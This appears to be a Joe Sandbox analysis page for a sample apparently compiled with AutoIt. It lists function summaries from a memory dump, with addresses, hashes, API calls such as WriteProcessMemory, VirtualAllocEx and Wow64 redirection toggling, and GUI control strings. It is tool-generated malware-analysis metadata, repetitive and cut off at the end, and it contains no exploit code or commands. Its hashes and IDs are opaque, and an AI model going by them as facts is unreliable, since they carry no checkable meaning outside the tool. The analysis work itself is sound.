Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID: 3cj$_j
API String ID: 4104443479-2927472950
Opcode ID: e330191add47d25d4a88bebfec2cb3540a93d5d6c74c51e4c326abc9ac466e3c
Instruction ID: 74c550003d2e37b954a5436c50f980cd2350c76edf97b04b670458485721a4fd
Opcode Fuzzy Hash: e330191add47d25d4a88bebfec2cb3540a93d5d6c74c51e4c326abc9ac466e3c
Instruction Fuzzy Hash: C1518CB0D006099FDB64DF68D884AEEBBB2FF44304F14852AE85AD7350EB31E965CB51

Function 006E97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E9296,?,?,00000034,00000800,?,00000034), ref: 006F14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006E983F

Part of subcall function 006F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006F14B1

Part of subcall function 006F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006F1409
Part of subcall function 006F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006E925A,00000034,?,?,00001004,00000000,00000000), ref: 006F1419
Part of subcall function 006F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006E925A,00000034,?,?,00001004,00000000,00000000), ref: 006F142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E98F9

Strings

@, xrefs: 006E9911

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 31d1c865f4ac99c9489c91dd68baca0baec61031aa4cb766dbc3406c15d14735
Instruction ID: 41895c8824aca12a032ab98e32e40cc9093fdacb7e08d8bf7bc7bd524af6a883
Opcode Fuzzy Hash: 31d1c865f4ac99c9489c91dd68baca0baec61031aa4cb766dbc3406c15d14735
Instruction Fuzzy Hash: 3F41627690121CBFCB10DFA4CC45AEEBBB9EF46340F044059FA45B7191DA706E45CBA4

Function 00717946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0071F910,00000000,?,?,?,?), ref: 007179DF
GetWindowLongW.USER32 ref: 007179FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00717A0C

Strings

SysTreeView32, xrefs: 007179B1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 58cf7e7772f319d040e2662e75eec462b929fe5a21704f3e0f37fab586f015fb
Instruction ID: d92f22206d3f24f668c669c06bbee4df048a3769cf73d2457d7376cd2d0979a6
Opcode Fuzzy Hash: 58cf7e7772f319d040e2662e75eec462b929fe5a21704f3e0f37fab586f015fb
Instruction Fuzzy Hash: 38318B71204606ABDF158E3CCC45BEA77A9EF09324F248729F875A22E0D739ED95CB50

Function 007173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00717461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00717475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00717499

Strings

SysMonthCal32, xrefs: 0071742C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: faf71e5a3806f861143c0739f2d90d5cf58a4573fe3ce3449680999e411260f3
Instruction ID: e56d3ea0fc11066b64bce1de0b1bc1f1599b11a0b9ca6c685978cbf8ceed6c36
Opcode Fuzzy Hash: faf71e5a3806f861143c0739f2d90d5cf58a4573fe3ce3449680999e411260f3
Instruction Fuzzy Hash: 5F21A332500259ABDF15CF98CC46FEA3B7AEF48724F114114FE156B1D0DA79AC91DBA0

Function 00716CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00716D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00716D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00716D70

Strings

Listbox, xrefs: 00716D08

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 9ab01e6cef254e0ec921a222e33069f7699c1a7d0cf846d86acb6f6e4e30d78d
Instruction ID: b356b01838df5b0af3ec7341d9160bb6ece94b197f8c7c4c1ae3489b8b6878c6
Opcode Fuzzy Hash: 9ab01e6cef254e0ec921a222e33069f7699c1a7d0cf846d86acb6f6e4e30d78d
Instruction Fuzzy Hash: 1C21C232700118BFDF118F58DC45EEB3BBAEF89760F018128FA459B1E0C675AC9187A0

Function 007039E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00703A66

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Strings

, $, xrefs: 00703AA6
AUTOITCALLVARIABLE%d, xrefs: 00703A58
%r, xrefs: 007039F4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%r
API String ID: 3506404897-1855777976
Opcode ID: 50383d618f89eb8b17b91bbbffb9cd8bee096a4f5b7a49ede0194b747bbabd0f
Instruction ID: 05e640ca508e22dcb37edbd4611e6955a91702cbcae30c79ee28820b983e065b
Opcode Fuzzy Hash: 50383d618f89eb8b17b91bbbffb9cd8bee096a4f5b7a49ede0194b747bbabd0f
Instruction Fuzzy Hash: F9218FB0700219EFCF54EF64CC82AAE77FAAF45710F004459F455AB182EB38EA45CB65

Function 0071770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00717772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00717787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00717794

Strings

msctls_trackbar32, xrefs: 00717749

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a942ee6c03b28ea51df2b005f5a1607bef0015357620f4d67597400d3fea1afc
Instruction ID: babcbe0d720de236d4dc74245e43b257bc8cc787779f1a27883e95c165ade558
Opcode Fuzzy Hash: a942ee6c03b28ea51df2b005f5a1607bef0015357620f4d67597400d3fea1afc
Instruction Fuzzy Hash: 3F11E372244209BAEF249F69CC05FEB77B9EF89B64F114528FA41A60D0D676E851CB20

Function 006B6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006B6B93
__calloc_crt.LIBCMT ref: 006B6BAC

Strings

t, xrefs: 006B6BD1
@Bu, xrefs: 006B6BC3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __calloc_crt
String ID: t$@Bu
API String ID: 3494438863-4292462000
Opcode ID: a55cf1b64a57c3e924ed8dba2f002283c36e8c65911d541d31b7289e0ac80eb7
Instruction ID: 8a805f77bb450edb7d86c20f03994fbe53676ebc07cdf6ae9303e28a1e5e75e8
Opcode Fuzzy Hash: a55cf1b64a57c3e924ed8dba2f002283c36e8c65911d541d31b7289e0ac80eb7
Instruction Fuzzy Hash: 4DF031F16447129AE7648F54FC61AD627A6F710734F50442AF101CF290EBBC98D18799

Function 006B9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 006B9B94

Part of subcall function 006B9C0B: __mtinitlocknum.LIBCMT ref: 006B9C1D
Part of subcall function 006B9C0B: EnterCriticalSection.KERNEL32(00000000,?,006B9A7C,0000000D), ref: 006B9C36

__updatetlocinfoEx_nolock.LIBCMT ref: 006B9BA4

Part of subcall function 006B9100: ___addlocaleref.LIBCMT ref: 006B911C
Part of subcall function 006B9100: ___removelocaleref.LIBCMT ref: 006B9127
Part of subcall function 006B9100: ___freetlocinfo.LIBCMT ref: 006B913B

Strings

8t, xrefs: 006B9B8A, 006B9B9F, 006B9BAB
8t, xrefs: 006B9B85

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8t$8t
API String ID: 547918592-3065990335
Opcode ID: d6b7c6015f3c52b941355fb8aa9fc443fe4b549464dbfabb82d8d471a0c3c56d
Instruction ID: 4e7995dde0ee44190a2a78204be4845c82225788bf15eb0c0964acc97e8f269c
Opcode Fuzzy Hash: d6b7c6015f3c52b941355fb8aa9fc443fe4b549464dbfabb82d8d471a0c3c56d
Instruction Fuzzy Hash: 69E046F1982304AAEAA0BBE86903B892766EB01B31F20415EF155560C18B680480C72F

Function 00694C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00694B83,?), ref: 00694C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00694C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00694C50
kernel32.dll, xrefs: 00694C3F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 3c6b015efe6d49c4b56cbb365a9c63490eb275954ca024e8dfcb1976bb2f34e7
Instruction ID: e870d4c8f9a6260261a9febe8ecc1dc4c97d3f70b181bdebd15605a51007b062
Opcode Fuzzy Hash: 3c6b015efe6d49c4b56cbb365a9c63490eb275954ca024e8dfcb1976bb2f34e7
Instruction Fuzzy Hash: C1D02B70504B13DFCB204F35D80868673DAAF01340B10C83DD495C67A0EB78C4C0C610

Function 00694C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00694BD0,?,00694DEF,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00694C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00694C1D
kernel32.dll, xrefs: 00694C0C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 7933880695b2b2d3cad29b26ec7302e5fc8588dead84d8ed659d1203b8dc4ab6
Instruction ID: 0d9edfa39fcf6e09e206f1327efd40ec94edc5041c2a086a121c93242fe89f05
Opcode Fuzzy Hash: 7933880695b2b2d3cad29b26ec7302e5fc8588dead84d8ed659d1203b8dc4ab6
Instruction Fuzzy Hash: AED0C270501B13DFCB205F74D808686B6DBEF08342B00CC39D485C2690EBB8C481CA10

Function 00710DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00711039), ref: 00710DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00710E07

Strings

RegDeleteKeyExW, xrefs: 00710E01
advapi32.dll, xrefs: 00710DF0

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 0c2b0fb69786d9ccd2c560aaac7e4eaaa3d7716807c763d2df615d335fc2bb25
Instruction ID: 6db4f7f789449cd880ac8324d51f08d5beb55ef2529e0693ec08fc8f466d279e
Opcode Fuzzy Hash: 0c2b0fb69786d9ccd2c560aaac7e4eaaa3d7716807c763d2df615d335fc2bb25
Instruction Fuzzy Hash: E0D0EC70510716DFD7205B79C808687B6D5AF04751F11CC6DE585D21D0D7B8D4E08654

Function 007090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00708CF4,?,0071F910), ref: 007090EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00709100

Strings

GetModuleHandleExW, xrefs: 007090FA
kernel32.dll, xrefs: 007090E9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 24060a5ddf1b257b2d9a3cbc78f2c0f09c9c8b372b09460e8610b7d7c98e5dfd
Instruction ID: f812044cbc925af3df829f024074600160a2a8efc817926b1f69432d8d11a71d
Opcode Fuzzy Hash: 24060a5ddf1b257b2d9a3cbc78f2c0f09c9c8b372b09460e8610b7d7c98e5dfd
Instruction Fuzzy Hash: 34D0C7B0610B1BDFCB208F38D80828672E5AF00341B22C83AD486C21D0EBBCC880CA90

Function 006D1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006D1718
__swprintf.LIBCMT ref: 006D1749

Strings

WIN_XPe, xrefs: 006D1788
%.3d, xrefs: 006D1723

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 0054bb3cd71ff5d0ddb93c447c85c1e41aea24636814913ed64559ffe0cb9aaa
Instruction ID: 699785358dd7ca081da0398280d28fe51c717dbabca8a4709fb4c25a7dee5716
Opcode Fuzzy Hash: 0054bb3cd71ff5d0ddb93c447c85c1e41aea24636814913ed64559ffe0cb9aaa
Instruction Fuzzy Hash: 38D012B1D04118FACB449B9098888F9777DA70A311F100553F50296261E2B59B96D625

Function 006E717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
Instruction ID: 8f33e704924a17d2d220303683fdc7a883f60017d555e204572ad99df7c6bd68
Opcode Fuzzy Hash: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
Instruction Fuzzy Hash: 56C15C74A05256EFDB14CFA9C884AAEBBF6FF48704B148598E805DB351D730ED81DB90

Function 0070E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0070E0BE
CharLowerBuffW.USER32(?,?), ref: 0070E101

Part of subcall function 0070D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0070E301
_memmove.LIBCMT ref: 0070E314

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: a214710bc4b6c2273f9f6328c85fdb835f996284cd2675d9c3ff7fdd64a145e1
Instruction ID: 74076e72ab778611ff0b2a8f86929f809ccaa2e407b3d3e62143d02ffcbbc057
Opcode Fuzzy Hash: a214710bc4b6c2273f9f6328c85fdb835f996284cd2675d9c3ff7fdd64a145e1
Instruction Fuzzy Hash: CEC16A71608301DFC754DF28C480A6ABBE5FF89714F148A6EF8999B391D734E946CB82

Function 00708093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007080C3
CoUninitialize.OLE32 ref: 007080CE

Part of subcall function 006ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ED5D4

VariantInit.OLEAUT32(?), ref: 007080D9
VariantClear.OLEAUT32(?), ref: 007083AA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 89a9a14cf6b511096a2507d99096a95bd2fe8b660e8dd6fa83ef241378309b3d
Instruction ID: 3d7e97cfddb0f793510a89a841d843039382151e15e52ffdb3c15712ec4e2b64
Opcode Fuzzy Hash: 89a9a14cf6b511096a2507d99096a95bd2fe8b660e8dd6fa83ef241378309b3d
Instruction Fuzzy Hash: 5FA15975204701DFCB80DF28C481A2AB7E9BF89324F04895CF9959B7A1DB34ED05CB96

Function 006E687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006E688E
SysAllocString.OLEAUT32(00000000), ref: 006E6937
VariantCopy.OLEAUT32 ref: 006E6966
VariantClear.OLEAUT32(?), ref: 006E698D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
